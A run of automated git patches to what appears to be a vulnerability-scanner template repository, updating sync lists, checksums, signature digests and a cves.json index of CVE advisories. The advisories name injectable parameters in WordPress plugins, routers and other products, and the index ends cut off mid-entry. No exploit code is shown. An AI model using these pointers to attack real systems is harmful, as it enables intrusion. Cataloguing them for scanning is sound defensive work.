b/.github/workflows/templates-sync.yml index 3e4fb89e2b..e38d6f6c8d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/craftercms-panel.yaml' + - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/technologies/craftercms-detect.yaml' workflow_dispatch: From 101758caa8ec7f701b46b4d98ca25e8128208920 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:05:29 +0000 Subject: [PATCH 0819/1768] Auto Generated New Template Addition List [Sun May 12 08:05:29 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4f5dd368dd..4921ec9466 100644 --- a/.new-additions +++ b/.new-additions @@ -3,3 +3,4 @@ http/exposed-panels/craftercms-panel.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/technologies/craftercms-detect.yaml +http/technologies/tinyproxy-detect.yaml From 048d03026f91c2a5ba69d8cee0e436e6d6bfa7dd Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:05:38 +0000 Subject: [PATCH 0820/1768] Auto Generated Templates Checksum [Sun May 12 08:05:38 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4c87803f76..d53ee8db35 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6925,6 +6925,7 @@ http/technologies/thinkphp-detect.yaml:4f4c4b8bb5ea605c7dd26335d710811935db624d http/technologies/tibco-businessconnect-detect.yaml:df1e040bbfa4c989246929173292176c9f5e3137 http/technologies/tibco-spotfire-services-detect.yaml:26a79d78f2c140283420e74921930270ad17851a http/technologies/tileserver-gl.yaml:27fe637c0f3de39676585f41d5980e246441bdab +http/technologies/tinyproxy-detect.yaml:ec51387f8f975ce3da63f0a9a675e9a6d7396c92 http/technologies/tor-socks-proxy.yaml:ad664f3598d1039dd335f4128e1cb81ceeef4864 http/technologies/tornado-server-login.yaml:7d8148d6ca18ef79abc33aceacbf8dbafd31d4d4 http/technologies/typo3-detect.yaml:206df0bc720861958780557535b8b4693ec64636 @@ -8504,7 +8505,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d9794e6063ce869679d056c7b930c2ac5a79cdc7 +templates-checksum.txt:e8fbafb43067877469b03daa618b2976298dc704 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3a99bf1ab1a68dca1933d77df6d9d25f63c546ac Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:05:58 +0000 Subject: [PATCH 0821/1768] Auto Template Signing [Sun May 12 08:05:58 UTC 2024] :robot: --- dns/dns-waf-detect.yaml | 3 +-- http/exposed-panels/craftercms-panel.yaml | 1 + http/misconfiguration/installer/moosocial-installer.yaml | 1 + 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml index 74bf75b1b9..49522e2bc7 100644 --- a/dns/dns-waf-detect.yaml +++ b/dns/dns-waf-detect.yaml @@ -198,5 +198,4 @@ dns: name: ksyun words: - ".ksyunwaf.com" - -# digest: 4a0a0047304502200a845666375d02a84b9b0a1b56465d375357774b8c0c3a044dccf1e02fbf6267022100bf5e4f34f8e41d1cf13880ed6760c273df09e408a6d0c53c335dceeadac76182:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022005bf81b04ee9a74169b2ea8baf29b776c3da72d7bf13cdf16f62a84baa003daf0220758d7619504e7c6a45cc29f1e7f3c71f7cbba93b4444cf419ddc9b01d486d265:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/craftercms-panel.yaml b/http/exposed-panels/craftercms-panel.yaml index a4355eb903..637e9b1bbe 100644 --- a/http/exposed-panels/craftercms-panel.yaml +++ b/http/exposed-panels/craftercms-panel.yaml @@ -32,3 +32,4 @@ http: group: 1 regex: - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' +# digest: 4a0a004730450221008f0a504337b6d23c677831b726cc8db9fd0d2f121cd363898e291746020c21010220587b99ea2eba7fdccb1f6883bbb072ee3516c6e0965f58f6b6ea1a38da1f6a91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/moosocial-installer.yaml b/http/misconfiguration/installer/moosocial-installer.yaml index fcb963e43f..982dffe81d 100644 --- a/http/misconfiguration/installer/moosocial-installer.yaml +++ b/http/misconfiguration/installer/moosocial-installer.yaml @@ -25,3 +25,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220604d6fd4b0d42d00cb69a6de6fd9fb6be4640fc77b52f7a5cd456b70204f44ac02201a0443dafa9f1e76cfee113ecdda14756f8c86e9721abeab06b8f5ec67d2472d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 89be3f606bf2d661e12a683e69108d6ee321fd79 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:06:14 +0000 Subject: [PATCH 0822/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e38d6f6c8d..c1db7f4338 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/technologies/craftercms-detect.yaml' + - 'http/technologies/tinyproxy-detect.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 66175fe44d7e0eb51355bce9acfbbbaae14dcf58 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:06:17 +0000 Subject: [PATCH 0823/1768] Auto Generated Templates Checksum [Sun May 12 08:06:17 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d53ee8db35..426cc491fb 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3155,6 +3155,7 @@ http/cves/2023/CVE-2023-43208.yaml:fe7941493bcf8b59fd55d2e57288bbb985cf2d65 http/cves/2023/CVE-2023-43261.yaml:4e229f26b444802b453164764a7f455c69bbcb56 http/cves/2023/CVE-2023-43325.yaml:7849edeca0eb8481c4a3aed6c3589196b6cef4a6 http/cves/2023/CVE-2023-43326.yaml:57d65b95951cc3b5e326ad3790f27d15e83d3a4d +http/cves/2023/CVE-2023-43374.yaml:4f7f62c35a898225da4c40a9b44f77de5b0f84e9 http/cves/2023/CVE-2023-43795.yaml:a14750da396529474d303182bee73893d7f284c9 http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e @@ -8505,7 +8506,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e8fbafb43067877469b03daa618b2976298dc704 +templates-checksum.txt:5c371db8064ff0116c0cf564c176e0dd4288a057 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 8eeda92b775eb29c8fc61d552f50d341b4e7987e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:06:19 +0000 Subject: [PATCH 0824/1768] Auto Generated cves.json [Sun May 12 08:06:19 UTC 2024] :robot: --- cves.json | 16 ++++++++++++++-- cves.json-checksum.txt | 2 +- 2 files changed, 15 insertions(+), 3 deletions(-) diff --git a/cves.json b/cves.json index 1f0da01659..e0e8c711e5 100644 --- a/cves.json +++ b/cves.json @@ -1973,7 +1973,6 @@ {"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"} {"ID":"CVE-2022-48197","Info":{"Name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","Severity":"medium","Description":"Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-48197.yaml"} {"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"} -{"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/ CVE-2023-6389.yaml"} {"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"} {"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"} {"ID":"CVE-2023-0159","Info":{"Name":"Extensive VC Addons for WPBakery page builder \u003c 1.9.1 - Unauthenticated RCE","Severity":"high","Description":"The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0159.yaml"} @@ -2262,12 +2261,14 @@ {"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"} {"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"} {"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"} +{"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"} {"ID":"CVE-2023-43795","Info":{"Name":"GeoServer WPS - Server Side Request Forgery","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43795.yaml"} {"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"} {"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"} {"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"} {"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"} {"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"} +{"ID":"CVE-2023-4521","Info":{"Name":"Import XML and RSS Feeds \u003c 2.1.5 - Unauthenticated RCE","Severity":"critical","Description":"The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4521.yaml"} {"ID":"CVE-2023-45375","Info":{"Name":"PrestaShop PireosPay - SQL Injection","Severity":"high","Description":"In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-45375.yaml"} {"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"} {"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"} @@ -2319,6 +2320,7 @@ {"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"critical","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"} {"ID":"CVE-2023-6379","Info":{"Name":"OpenCMS 14 \u0026 15 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6379.yaml"} {"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"} +{"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6389.yaml"} {"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"} {"ID":"CVE-2023-6567","Info":{"Name":"LearnPress \u003c= 4.2.5.7 - SQL Injection","Severity":"high","Description":"The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6567.yaml"} {"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"} @@ -2328,13 +2330,16 @@ {"ID":"CVE-2023-6895","Info":{"Name":"Hikvision IP ping.php - Command Execution","Severity":"critical","Description":"A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"} {"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"} {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"} +{"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"} {"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} +{"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} {"ID":"CVE-2024-0235","Info":{"Name":"EventON (Free \u003c 2.2.8, Premium \u003c 4.5.5) - Information Disclosure","Severity":"medium","Description":"The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-0235.yaml"} {"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"} {"ID":"CVE-2024-0337","Info":{"Name":"Travelpayouts \u003c= 1.1.16 - Open Redirect","Severity":"medium","Description":"The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0337.yaml"} {"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"} {"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"} +{"ID":"CVE-2024-0881","Info":{"Name":"Combo Blocks \u003c 2.2.76 - Improper Access Control","Severity":"medium","Description":"The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0881.yaml"} {"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"critical","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"} {"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"critical","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"} {"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"} @@ -2377,9 +2382,16 @@ {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} {"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"} {"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"} -{"ID":"CVE-2024-31849","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"} +{"ID":"CVE-2024-31848","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server 